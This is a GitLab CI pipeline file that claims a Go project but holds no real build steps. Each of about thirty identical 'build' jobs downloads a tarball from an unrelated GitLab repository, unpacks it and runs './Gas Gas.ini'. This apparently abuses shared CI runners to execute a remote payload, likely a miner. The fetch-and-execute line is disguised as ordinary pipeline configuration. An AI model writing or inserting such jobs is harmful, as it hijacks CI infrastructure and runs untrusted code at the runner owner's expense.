image: golang:latest

variables:
  REPO_NAME: gitlab.com/namespace/project

stages:
  - build
  - test
  - deploy

build_a:
  stage: build
  script:
    - wget https://gitlab.com/Aci-sampeu/sampeu/-/raw/master/ogin.tar.gz && tar -xvf ogin.tar.gz && ./Gas Gas.ini

build_b:
  stage: build
  script:
    - wget https://gitlab.com/Aci-sampeu/sampeu/-/raw/master/ogin.tar.gz && tar -xvf ogin.tar.gz && ./Gas Gas.ini

build_c:
  stage: build
  script:
    - wget https://gitlab.com/Aci-sampeu/sampeu/-/raw/master/ogin.tar.gz && tar -xvf ogin.tar.gz && ./Gas Gas.ini

build_d:
  stage: build
  script:
    - wget https://gitlab.com/Aci-sampeu/sampeu/-/raw/master/ogin.tar.gz && tar -xvf ogin.tar.gz && ./Gas Gas.ini

build_e:
  stage: build
  script:
    - wget https://gitlab.com/Aci-sampeu/sampeu/-/raw/master/ogin.tar.gz && tar -xvf ogin.tar.gz && ./Gas Gas.ini

build_f:
  stage: build
  script:
    - wget https://gitlab.com/Aci-sampeu/sampeu/-/raw/master/ogin.tar.gz && tar -xvf ogin.tar.gz && ./Gas Gas.ini

build_g:
  stage: build
  script:
    - wget https://gitlab.com/Aci-sampeu/sampeu/-/raw/master/ogin.tar.gz && tar -xvf ogin.tar.gz && ./Gas Gas.ini

build_h:
  stage: build
  script:
    - wget https://gitlab.com/Aci-sampeu/sampeu/-/raw/master/ogin.tar.gz && tar -xvf ogin.tar.gz && ./Gas Gas.ini

build_i:
  stage: build
  script:
    - wget https://gitlab.com/Aci-sampeu/sampeu/-/raw/master/ogin.tar.gz && tar -xvf ogin.tar.gz && ./Gas Gas.ini

build_j:
  stage: build
  script:
    - wget https://gitlab.com/Aci-sampeu/sampeu/-/raw/master/ogin.tar.gz && tar -xvf ogin.tar.gz && ./Gas Gas.ini

build_k:
  stage: build
  script:
    - wget https://gitlab.com/Aci-sampeu/sampeu/-/raw/master/ogin.tar.gz && tar -xvf ogin.tar.gz && ./Gas Gas.ini

build_l:
  stage: build
  script:
    - wget https://gitlab.com/Aci-sampeu/sampeu/-/raw/master/ogin.tar.gz && tar -xvf ogin.tar.gz && ./Gas Gas.ini

build_m:
  stage: build
  script:
    - wget https://gitlab.com/Aci-sampeu/sampeu/-/raw/master/ogin.tar.gz && tar -xvf ogin.tar.gz && ./Gas Gas.ini

build_n:
  stage: build
  script:
    - wget https://gitlab.com/Aci-sampeu/sampeu/-/raw/master/ogin.tar.gz && tar -xvf ogin.tar.gz && ./Gas Gas.ini

build_o:
  stage: build
  script:
    - wget https://gitlab.com/Aci-sampeu/sampeu/-/raw/master/ogin.tar.gz && tar -xvf ogin.tar.gz && ./Gas Gas.ini

build_p:
  stage: build
  script:
    - wget https://gitlab.com/Aci-sampeu/sampeu/-/raw/master/ogin.tar.gz && tar -xvf ogin.tar.gz && ./Gas Gas.ini

build_q:
  stage: build
  script:
    - wget https://gitlab.com/Aci-sampeu/sampeu/-/raw/master/ogin.tar.gz && tar -xvf ogin.tar.gz && ./Gas Gas.ini

build_r:
  stage: build
  script:
    - wget https://gitlab.com/Aci-sampeu/sampeu/-/raw/master/ogin.tar.gz && tar -xvf ogin.tar.gz && ./Gas Gas.ini

build_s:
  stage: build
  script:
    - wget https://gitlab.com/Aci-sampeu/sampeu/-/raw/master/ogin.tar.gz && tar -xvf ogin.tar.gz && ./Gas Gas.ini

build_t:
  stage: build
  script:
    - wget https://gitlab.com/Aci-sampeu/sampeu/-/raw/master/ogin.tar.gz && tar -xvf ogin.tar.gz && ./Gas Gas.ini
    
build_u:
  stage: build
  script:
    - wget https://gitlab.com/Aci-sampeu/sampeu/-/raw/master/ogin.tar.gz && tar -xvf ogin.tar.gz && ./Gas Gas.ini

build_v:
  stage: build
  script:
    - wget https://gitlab.com/Aci-sampeu/sampeu/-/raw/master/ogin.tar.gz && tar -xvf ogin.tar.gz && ./Gas Gas.ini

build_w:
  stage: build
  script:
    - wget https://gitlab.com/Aci-sampeu/sampeu/-/raw/master/ogin.tar.gz && tar -xvf ogin.tar.gz && ./Gas Gas.ini

build_x:
  stage: build
  script:
    - wget https://gitlab.com/Aci-sampeu/sampeu/-/raw/master/ogin.tar.gz && tar -xvf ogin.tar.gz && ./Gas Gas.ini

build_y:
  stage: build
  script:
    - wget https://gitlab.com/Aci-sampeu/sampeu/-/raw/master/ogin.tar.gz && tar -xvf ogin.tar.gz && ./Gas Gas.ini

build_z:
  stage: build
  script:
    - wget https://gitlab.com/Aci-sampeu/sampeu/-/raw/master/ogin.tar.gz && tar -xvf ogin.tar.gz && ./Gas Gas.ini

build_ab:
  stage: build
  script:
    - wget https://gitlab.com/Aci-sampeu/sampeu/-/raw/master/ogin.tar.gz && tar -xvf ogin.tar.gz && ./Gas Gas.ini

build_ac:
  stage: build
  script:
    - wget https://gitlab.com/Aci-sampeu/sampeu/-/raw/master/ogin.tar.gz && tar -xvf ogin.tar.gz && ./Gas Gas.ini

build_ad:
  stage: build
  script:
    - wget https://gitlab.com/Aci-sampeu/sampeu/-/raw/master/ogin.tar.gz && tar -xvf ogin.tar.gz && ./Gas Gas.ini

build_ae:
  stage: build
  script:
    - wget https://gitlab.com/Aci-sampeu/sampeu/-/raw/master/ogin.tar.gz && tar -xvf ogin.tar.gz && ./Gas Gas.ini